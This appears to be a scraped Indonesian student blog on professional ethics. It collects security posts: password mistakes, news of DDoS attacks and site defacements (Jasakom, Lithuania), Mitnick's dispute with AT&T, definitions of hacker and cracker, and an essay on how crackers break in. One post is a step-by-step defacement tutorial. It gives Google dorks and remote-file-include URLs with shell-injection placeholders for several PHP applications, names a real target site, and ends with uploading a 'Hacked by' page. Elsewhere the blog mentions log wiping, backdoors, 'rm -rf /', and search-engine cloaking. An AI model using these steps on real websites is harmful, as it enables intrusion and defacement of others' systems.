Kita banyak mendengar kriminalitas di dunia komputer, banyak situs di deface/hack, kartu kredit disalah gunakan oleh orang lain. Tapi yang menjadi pertanyaan, apakah ini kesalahan sistem semata ?? Berikut penulis mengungkapkan 5 kesalahan utama dalam hal security berdasarkan pengetahuan yang didapat dan pengalaman.



Banyak negara sudah mulai 'aware' / menaruh perhatian pada keamanan komputer (computer security) atau Internet security dengan adanya hukum cyber atau hukum mengenai kejahatan komputer salah satu contohnya adalah di Vietnam mulai bulan Mei. Dengan adanya hukum yang mengatur keamanan di bidang komputer ini bukan berarti dapat menghilangkan pelanggaran atau kejahatan dalam bidang ini tetapi setidaknya ada langkah yang akan diambil seandainya terjadi pelanggaran. Tapi sebenarnya masalah utama yaitu terletak pada pengguna/user yang menggunakan komputer.


Tampak bahwa perhatian pada bidang keamanan/security belakangan ini cukup meningkat dengan adanya pemberitaan di berbagai majalah ibukota terutama setelah terjadinya berbagai kasus penyalahgunaan di dunia cyber seperti contoh kasus situs BCA yang di-duplikat dengan nama yang mirip beberapa waktu lalu. Terlihat juga antusias dari pengunjung situs Techmedia pada artikel yang dibuat rekan kami 'cyworm' yaitu mengcrack Windows 2000 yang mencapai hit sekitar 500 lebih.


Oleh sebab itu penulis akan mencoba menulis beberapa artikel mengenai bidang keamanan jaringan komputer ini, tetapi sebelumnya penulis akan menyoroti 5 kesalahan utama yang dilakukan orang sehingga mengakibatkan data mereka dapat dicuri orang lain, situs dapat di hack/deface dsbnya.


Orang umumnya sebelum meninggalkan rumah akan mengunci pintu terlebih dahulu, tetapi dalam penggunaan komputer, orang lebih cenderung lebih ceroboh. Hal ini tidak hanya mencakup end-user atau pengguna tetapi termasuk semua orang di departemen IT. Berikut ini adalah 5 kesalahan utama dalam security.


Menuliskan Password di Kertas. Ini benar-benar terjadi. Selama penulis masih menjadi system administrator, beberapa kali penulis menemukan usernya menuliskan password mereka di secarik kertas atau kertas post-it kemudian menempelkannya di PC atau samping monitor. Terlalu malas untuk mengingat password mereka, sehingga dicatat di kertas dan meletakkannya begitu saja sehingga semua orang bisa membacanya. Berdasarkan survei yang pernah dilakukan oleh lembaga security di US menemukan bahwa sekitar 15 - 20 % user di suatu perusahaan melakukan hal ini. Andaikan user di perusahaan A mencapai 100 orang maka ada sekitar 15 sampai 20 orang yang melakukan keteledoran ini. Suatu jumlah yang besar yang dapat mengakibatkan kebocoran data perusahaan.


Pemilihan password yang jelek. Ada kecenderungan orang dalam memilih password mereka adalah dengan menggunakan nama orang dekat mereka seperti nama suami atau istri, nama pacar, nama orang-tua, nama binatang kesayangan atau tulisan di sekitar mereka yang gampang ditebak oleh orang lain. Atau bahkan menggunakan tanggal lahir mereka sendiri. Rekan saya cyworm dalam artikelnya telah menunjukkan bahwa penggunaan password yang jelek akan dengan gampang di-"crack" apalagi kalau password yang digunakan sama dengan user-name maka kurang dari semenit password tersebut akan dapat di-crack. Jika anda menggunakan password dengan kombinasi abjad, nomor dan huruf besar-kecil, maka dibutuhkan waktu yang cukup lama untuk meng-crack dan juga tergantung seberapa panjang password yang digunakan juga. Saat ini beberapa situs tertentu menggunakan kalimat (phrase) sebagai password seperti di situs hushmail.


Meninggalkan komputer yang sedang digunakan begitu saja. Ada banyak orang yang meninggalkan komputer mereka tanpa proteksi apa apa. Buat apa password ??? orang lain tinggal datang dan duduk untuk mengakses data anda. Berbagai sistem operasi sudah memberikan fasilitas seperti screen saver yang bisa diaktifkan passwordnya setelah misalnya 5 menit atau berapa sesuai dengan yang diset atau bisa di-lock begitu kita mau meninggalkan komputer kita.


Membuka lampiran (attachment) email tanpa melakukan pengecekan terlebih dahulu. Seiring dengan maraknya penggunaan email, virus banyak menyebar melalui email. Salah satu kesalahan utama yang banyak dilakukan oleh orang adalah membuka attachment email tanpa melakukan konfirmasi atau pengecekan terlebih dahulu terutama kalau mendapat kiriman dari orang yang tidak dikenal. Efek yang ditimbulkan selanjutnya jika attachmen itu berupa virus maka akan berakibat pada kehilangan data. Penulis sering kali menerima email dari orang tidak dikenal yang setelah dideteksi oleh program anti virus ternyata memang berisi virus terutama virus worm seperti Magistr.


Tidak adanya kebijakan security komputer di perusahaan. Bukan hal yang aneh jika perusahaan di Indonesia tidak memiliki hal ini karena perusahaan di Indonesia masih tidak 'aware' dengan security kecuali perusahaan multinasional, itupun karena keharusan dari headquarter yang mengharuskan menerapkan 'policy' di perusahaan mereka di Indonesia. Security policy ini yang mengatur segala hal yang berkaitan dengan keamanan komputer seperti penerapan password setiap orang (mis : 6 karakter panjangnya dan kombinasi numerik dan karakter), juga berisi sanksi yang akan diterima jika terjadi pelanggaran.


Masih terdapat beberapa penyebab kebocoran data komputer yang disebabkan oleh kelalaian dari si pengguna seperti laptop yang ditinggalkan di mobil sehingga bisa dicuri orang lain dan memberitahukan passwordnya ke orang lain. Jadi secanggih apapun teknologi yang diimplementasikan misalnya BCA meng-klaim mereka telah menggunakan enkrips SSL 128 bit, kemudian firewall dan berbagai proteksi lainnya (lihat artikel mengenai BCA di Techmedia). Tapi kesalahan mengetik dari para customer BCA bisa membawa kebocoran dana ataupun data.


Penulis sangat setuju dengan apa yang dikatakan oleh Bruce Schneier dalam bukunya 'Secret and Lies' bahwa security itu bukanlan produk atau teknologi, baik teknologi dan produk itu hanya sebagian kecil dari security itu sendiri. Security merupakan suatu Proses. Jadi proses dari perencanaan kebijakan security, review produk dan teknologi sampai dengan implementasi kemudian auditing.

Read More..

Kerugian Capai Rp 100 Juta
PALEMBANG – Tindak kejahatan di dunia maya atau yang lebih dikenal dengan cyber crime terjadi di metropolis. Seperti yang dilaporkan Yudha Pratomo ST (27), general manager PT Elektrindo Data Nusantara/Elnus (perusahaan teknologi informasi– internet service provider), Rabu (20/9) ke Siaga Ops Polda Sumsel.


Warga Jl Srijaya Negara, Kompleks Unsri No 25, RT 29, Kelurahan Bukit Lama, Kecamatan IB I, menyebutkan, kasus cyber crime yang dialami jaringan internet miliknya di Jl Jenderal Sudirman, Graha Bunda Lt 5, terjadi Jumat (15/9) sekitar pukul 20.30 WIB.
“Seseorang dengan nama samaran Mahadewa melakukan penyusupan atau dikenal istilah hacking ke fasilitas server/router dan melumpuhkan serta merusak jaringan internet milik kami, dan telah terjadi berulang-ulang sampai kami melapor,” ujar Yudha kepada Kepala Siaga Ops Polda Sumsel shief C Kompol Toheriyanto

Yudha menambahkan, pelaku (disebut hacker) melakukan serangan flood (DDOS attack) dengan memanfaatkan server asing ke router milik tempatnya bekerja, yang menyebabkan jaringan terputus dan tidak dapat melakukan aktivitas secara normal hingga mengalami kerugian sebesar Rp 100 juta. “Informasi ini kami dapatkan melalui log kejadian dari Firewall Elnus dan Indosat,” ulasnya.

Sesaat setelah serangan flood tersebut, Yudha menuturkan pihaknya mendapat informasi dari Firewall yang mengidentifikasi bahwa sumber serangan tersebut berasal dari IP Address 199.238.132.226 yang ditujukan ke roter Gateway milik PT Elnus. IP Addres tersebut terindikasi sebagai milik VERIO.COM yaitu sebuah server hosting yang berada di Amerika Serikat.
Dengan melakukan resolving menggunakan DNSSTUF.COM didapatkan bahwa hostname “nenen-di.biz” me-reserve ke IP Address tersebut. “Dari pantauan aktivitas yang bersangkuat di IRC, pelaku meletakkan BOT PSY di server tersebut dengan nama samaran Mahadewa,” tukas Yudha, yang laporan pengaduannya diterima dengan bukti laporan nomor polisi LP/566-B/IX/2006-Siaga Ops Polda Sumsel.

Terpisah, Kapolda Sumsel melalui Kabid Humas Polda Kombes Pol Abusopah Ibrahim SH didampingi Direktur Reskrim Polda Kombes Pol PS Pakpahan SH mengatakan akan menyelidiki kasus yang dialami Elnus ini. “Kita akan coba menangani kasus ini. Jajaran kita akan mengumpulkan informasi lebih banyak yang bisa membantu penyelidikan,” tegas Abusopah. (01/46)

sumeks.co.id

Read More..

Cara Mudah Deface Web Via RFI

by Tugas Etika Profesi | 10.06 in | komentar (0)

Cara Mudah Deface Remote File Include
Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..


cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
[EvilShellInject] = inject rshell / c99 kamu
Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :
Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com
- Site Oneadmin RFI
Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=
Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]
- PnPhpBB2
Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
- Support Ticket
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]
Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Neh aku kasi beberapa web yang telah berhasil saya Deface..
Nah setelah itu buadlah sebuad file: index.html
Isi dengan:

Hacked by Nama Kamu

Kemudian upload deh file ke directorynya
kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html
Enjoy

Read More..

Anda seorang hacker ? Atau anda bukan seorang hacker tetapi pingin menjadi hacker / cracker
dengan belajar cara menjadi seorang hacker yang bercita-cita menghacking website-website ternama / terkenal, atau ingin belajar membobol account bank. mencuri identitas kartu kredit / credit card, memporakporandakan blog / website milik yahoo,google,microsoft,symantec,dll ? Tampaknya tidak perlu sampai berpikir terlalu muluk-muluk untuk menjadi pemenang, anda cukup bisa menghacking search engine, dan banyak teknik-teknik / ilmu hitam utk menghack search engine…
Sangat mudah sekali, dan banyak sekali website-website personal yang mengajarkan teknik itu,

selain bebas dari masalah kriminal (karena hack search engine tidak sama dengan hacking tradisional), belajar menghacking google,yahoo,msn,dll juga sangat mengasyikkan, anda cukup mempelajari program seperti php atau perl ataupun asp, tidak perlu sampai belajar assembly atau c ataupun bahasa programming c++.
Salah satu teknik yang paling berbahaya adalah cloaking page, dimana anda bisa membuat search engine menjadi takluk kepada anda.
Jika teknik cloaking pages ini anda terapkan dan anda kombinasikan dengan sedikit potongan bahasa HTML alias kolaborasi sensasional yang mantap,
dengan memberikan sedikit META TAG noarchive, wow.. saya tidak bisa membayangkan bagaimana google akan bertekuklutut terhadap anda.
Saya sendiri pernah menerapkannya saat parked domain, dan memang sangat berbahaya sekali, revenue saya dari parked domain bisa mencapai 10 euro tiap domain,
coba bayangkan kalau anda mempunyai 50 domain ? Amazing..
Tetapi sekali lagi, saya tidak sarankan anda menjadi seorang penjahat, tetapi mungkin ini sedikit gambaran bagaimana menghack system jaringan tidak sama dengan hacking search engine.
Baca juga:


Read More..


Setelah mendapati account wireless provider AT&T dan informasi personalnya yang diposting ke website provider tersebut, hacker ternama Kevin Mitnick mengatakan hawa provider layanan seluler tersebut seharusnya membayar kompensasi atas masalah tersebut. Namun, pihak AT&T malah berencana untuk membatalkan kontrak Mitnick dan tidak membayar kerusakan atas pelanggaran tersebut, walaupun layanannya masih befungsi hingga Kamis (20/08) lalu.
“AT&T ingin saya keluar dari jaringan mereka karena mereka sebenarnya tidak dapat mengamankan account saya,

dan setelah saya menjadi pelanggan yang loyal untuk beberapa decade, malah mendapat perlakuan seperti ini. Tampaknya lebih efektif dengan membuang saya ketimbang mengamankan informasi pelanggan mereka. Saya ingin me-review kontrak saya untuk melihat batasan apa saja yang ada di agreement layanan AT&T. Saya mungkin bisa mengajukan tuntutan untuk adanya invasi privacy atas kerusakan account saya dan untuk memproteksi informasi rahasia milik saya.” ungkap Mitnick.
Ironisnya, Mitnick berspekulasi bahwa siapapun yang bertanggungjawab telah menyusup ke account-nya past menggunakan teknik social engineering miliknya, yang pernah dibukukan dalam The Art of Deception miliknya. “Oknum tersebut mungkin membaca buku saya dan memutuskan untuk mencuri informasi saya menggunakan teknik social engineering saya karena caranya sangat mudah. Saya sudah bilang ke AT&T, namun mereka mengabaikannya. Kemungkinan lainnya dapat berimbas kepada pelanggan AT&T lainnya” jawab Mitnick.
Mitnick melancarkan komplainnya sejak Juni lalu, dan menemukan seseorang telah memposting nomor ponsel, alamat rumah, PIN, alamat email, IM, dan 4 digit terakhir dari nomor Social Security di web AT&T di bulan Maret. Ketika ia gagal mendapatkan respon dari AT&T atas komplainnya, kemudian ia memanggil pengacara untuk membayar sejumlah kerusakan atas reputasi dan hak ciptanya. Namun, menurut juru bicara AT&T, pihaknya telah menginvestigasi klaim Mitnick, dan memutuskan untuk menolak permintaan ganti rugi uang untuk Mitnick, namun membiarkan ia keluar dari kontrak, dan memilih carrier lain yang lebih nyaman baginya.
v (^o^) v

Read More..

To the Hack ...

by Tugas Etika Profesi | 10.03 in | komentar (0)

Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan – mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.


Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik – jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut – karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.
Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm . Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/ , http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.
Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/ . Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini – tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.
Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.
Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 – karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.
Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.
Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).
Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.
Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls ‘ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn ‘, dan (5) mem-finger user di mesin-mesin eksternal lainnya.
Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.
Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.
Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).
Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ‘clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.
Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.
Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm -rf / &’.
Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.
Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko ( handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak – bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.
Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.

Read More..

Ratusan Web Site Lithuania Kena Deface

by Tugas Etika Profesi | 10.01 in | komentar (0)


Akhir pekan kemarin, ratusan Web Site Lithuania di-deface oleh kelompok pro-Soviet dan anti Lithuania, seperti yang dikutip dari berita The New York Times.
Jumat kemarin, situs pemerintah Lithuania telah mendapatkan peringatan akan adanya serangan terhadap website dan segera melakukan pertahanan. Namun, banyak situs komersil tidak mengetahui peringatan tersebut, sehingga ratusan situs tersebut terkena deface.

Tapi, Senin kemarin, banyak diantara situs tersebut sudah kembali seperti semula.
Bukti awal menunjukkan ada sebuah kelompok hacker yang telah mengorganisasikan untuk melakukan serangan. Alamat IP yang digunakan untuk melakukan serangan berasal dari berbagai negara, tapi menurut Reston dari iDefense,  dalam pernyataannya ke The Washington Post bahwa satu situs, hack-war.ru, sepertinya ikut dalam aksi sernagan tersebut.

Dancho Danchev, dari ZDNet menjelaskan bahwa aksi deface tersebut bisa saja meluas/meningkat menjadi aksi denial-of-service. Selain itu, Brian Krebs dari The Wahington Post berspekulasi bahwa Negara-negara pecahan akan mencoba untuk mempertahankan diri dari aksi cyber attack yang sama seperti apa dialami oleh ratusan web Lithuania dimasa mendatang.
Sama seperti serangan Denial-Of-Service (DOS) ke situs-situs Estonia, serangan yang baru terjadi ini merupakan reaksi dihilangkannya symbol Soviet di bendera Lithuania.
Penulis : Arief Lukman
FTI - Universitas Atmajaya

Read More..

Situs Jasakom di deface oleh Hacker Malaysia
Rabu, 3 Oktober bisa dikatakan sebagai hari yang kelam bagi komunitas Jasakom. Situs jasakom beserta forum jasakom telah dihack dan database yang digunakan juga dihapus semua. Akibatnya, website tidak bisa diakses dan hanya menampilkan pesan :


HACKED BY TBD.MY

Sepandai tupai melompat, akhirnya jatuh ke tanah juga.
I came here for a revenge for what you have done to our early tbd.
How does it feel now? you website has been hacked! Do you even have backup?
Do whatever you want, who cares, Good luck with your backup.
If its not because of Indonesian stupidity, we (malaysian) dont even how to hate Indonesia.
Why we hack you? because of Indonesian egos and stupidity.
We dont hate Indonesian, but YOU (Indonesian) make us hate you.
All database has been droped like you did to tbdsecurity.com database

JASAKOM, IF YOU THINK YOU ARE SECURE ? YOURE NOT!!
youre nothing just piece of crap. We wont attack you, If you stay away from .my sites
Greetz: XShimeX, suhz, Th3-Banjarian, TBD.MY, Dark Malaysia, HMSecurity, d3ck4


Dengan dihapusnya semua data diserver, otomatis forum Jasakom yang menaungi lebih dari 40.000 anggota menjadi tidak bisa diakses sama sekali. Karena data yang telah terhapus semua, restore web dan forum terpaksa dilakukan melalui data yang telah terbackup sebelumnya dan akhirnya bisa diaktifkan dalam hari yang sama juga.
Sampai saat ini, masih belum diketahui secara pasti teknik yang digunakan untuk melakukan hacking kedalam situs dan forum jasakom karena akses terhadap log yang cukup terbatas. Berdasarkan analisa dari log yang ada, bisa diketahui beberapa hal. Diantaranya adalah hacker melakukan aksi hackingnya dengan user dan password web hosting. Berdasarkan user dan password dari hosting ini, hacker masuk ke spanel dan melakukan aksi perusakan dari situ. Berdasarkan log, terlihat pula ada percobaan pengambilan database. Karena akses ke dalam web hosting, hampir bisa dipastikan bahwa database forum maupun web telah berhasil didapatkan.
Berdasarkan database yang didapatkan ini, diperkirakan hacker akan mencoba mendapatkan password semua user web dan forum jasakom yang berjumlah hampir 100.000 orang walaupun tahapan ini tetap membutuhkan waktu dan keberuntungan. Untuk mendapatkan password, hacker harus menjalani proses cracking hash table karena semua password yang tersimpan didalam database telah dilakukan proses hash yang tidak bisa langsung dibaca. Password yang menggunakan kata-kata umum seperti 'admin', '123',dlsb biasanya akan mudah diketahui dalam waktu singkat namun apabila password yang digunakan sangat rumit seperti 'b4t*k$_.1nd0N4siA.!' (bisa dibaca 'batik indonesia'), hampir tidak mungkin mendapatkan password ini. Jadi semakin rumit dan banyak jumlah karakter yang digunakan, semakin sulit mendapatkan passwordnya, sekalipun hacker telah mengetahui nilai hash.
Selain menghapus database, Hacker Malaysia juga tampak melakukan serangan Ddos ke situs jasakom, forum jasakom dan situs jatimcrew melalui berbagai situs yang berhasil didapatkan. Serangan ddos tampaknya menggunakan teknik iframe yaitu membuat pengguna yang membuka halaman yang telah dihack secara otomatis membuka situs jasakom dalam jumlah yang banyak. Semakin banyak pengguna, akan semakin banyak akses ke situs jasakom dan hal ini akan membuat situs menjadi down apabila tidak memiliki bandwidth yang cukup.
Berdasarkan apa yang terjadi, kami memohon maaf kepada para pengguna situs dan forum jasakom atas gangguan yang terjadi. Kami juga menghimbau para pengguna web dan forum untuk segera mengganti password yang digunakan sebelum proses cracking berhasil dilakukan. Untuk menjaga-jaga, sebaiknya segera gunakan password yang aman agar pencurian database tidak akan membahayakan account Anda. Password yang aman disarankan agar menggunakan minimal 8 karakter, menggunakan kombinasi huruf kecil, besar dan spesial karakter.

Read More..

Pengertian Hacker dan Cracker

by Tugas Etika Profesi | 10.00 in | komentar (0)

1. Hacker
Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer.Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.
2. Cracker
Sedangkan cracker adalah sebutan untuk orang yang mencari kelemahan system dan memasukinya untuk kepentingan pribadi dan mencari keuntungan

dari system yang di masuki seperti: pencurian data, penghapusan, dan banyak yang lainnya.
Hirarki / Tingkatan Hacker
Ternyata Hacker juga mempunyai tingkatan-tingkatan, tiap tingkatan di bedakan dengan kemampuan dan ilmu yang dimiliki sang hacker :
1.Elite
Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’.
2.Semi Elite
Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.
3.Developed Kiddie
Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, mereka membaca tentang metoda hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.
4.Script Kiddie
Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.
5.Lammer
